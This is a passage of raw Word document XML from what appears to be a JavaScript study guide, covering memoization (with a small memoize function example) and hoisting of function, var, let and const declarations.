          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Memoization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B22D9" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Memoization reduces the number of redundant calculations, leading to faster execution times, especially for recursive functions like Fibonacci or factorial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E48C3D" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoiding Recalculations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By storing previously computed results, memoization prevents unnecessary recalculations for the same inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4DCD9" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficiency in Expensive Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Memoization is particularly beneficial for functions that involve expensive operations, such as network requests, complex mathematical computations, or large data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F93EC1" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE96EB9" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Recursive Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72496561" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Functions like Fibonacci, factorial, or other recursive algorithms often benefit from memoization because they repeatedly solve the same subproblems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C32098" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dynamic Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC61F7D" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memoization is a key technique in dynamic programming, where the solution to a problem is built from the solutions to its subproblems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B2E80F" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimization Problems</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D65A2" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Problems that require optimization, such as caching results from API calls or database queries, can be solved efficiently using memoization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B0DE0E" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with Multiple Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A438FA3" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memoization also works with functions that have multiple arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67588715" w14:textId="0CC9F7E6" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="00E14047"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w:t>
      </w:r>
      <w:r w:rsidR="005A6249" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>unction memoize(fn) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A43316E"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cache = new Map();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC2C05"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function(...args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C1743D"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key = JSON.stringify(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D951963"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(cache.has(key)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB9A8A"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cache.get(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64AD72"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75EDE6E"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result = fn(...args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D881115"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cache.set(key, result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804147E"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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F92F2A7"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373B215"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883990F"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B93AE96"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add = (a, b) =&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D9E09"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memoizedAdd = memoize(add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4AE89"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C68B3EE"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console.log(memoizedAdd(1, 2)); // 3 (calculated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB9C76" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249"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console.log(memoizedAdd(1, 2)); // 3 (cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB83BFB" w14:textId="77777777" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="005A3D24" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DC7FBD" w14:textId="73CFEE3B" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc178383251"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Hoisting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="1271157E" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hoisting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a JavaScript mechanism where variable and function declarations are moved (or "hoisted") to the top of their containing scope during the compilation phase, before the code is executed. This means that you can use variables and functions before they are declared in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17523D72" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Hoisting Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490BFA82" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Function Declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B961AA0" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Entire function declarations are hoisted to the top of their scope. This allows you to call a function before its declaration in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A28455A"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sayHello(); // "Hello, world!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F94332"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693A32B"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sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E75F78"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console.log("Hello, world!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4656F0"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881EE95" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, the sayHello function is hoisted, so it can be called before its declaration in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAAA936" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Variable Declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A69B7" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Variables declared using var are hoisted to the top of their scope, but only the declaration is hoisted, not the initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2656F1" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This means that the variable is undefined until the line where it is initialized is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41462D0D"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console.log(x); // undefined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B1647"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var x = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2715E"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console.log(x); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153F93E" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, the declaration var x is hoisted, but the assignment x = 5 is not. Therefore, the first console.log(x) outputs undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D8E0C" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>let and const Declarations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F49FC" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Variables declared with let and const are also hoisted, but unlike var, they are not initialized. They remain in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Temporal Dead Zone (TDZ)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> until the line where they are declared is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76162A66" w14:textId="77777777" w:rsidR="001314A6" w:rsidRPr="00DA2F32" w:rsidRDefault="001314A6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Accessing these variables before their declaration results in a ReferenceError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAA51A"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console.log(y); // ReferenceError: Cannot access 'y' before initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699CA4E5"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y = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396EC5DA"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9A8FBCF"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console.log(z); // ReferenceError: Cannot access 'z' before initialization</w:t>
      </w:r>
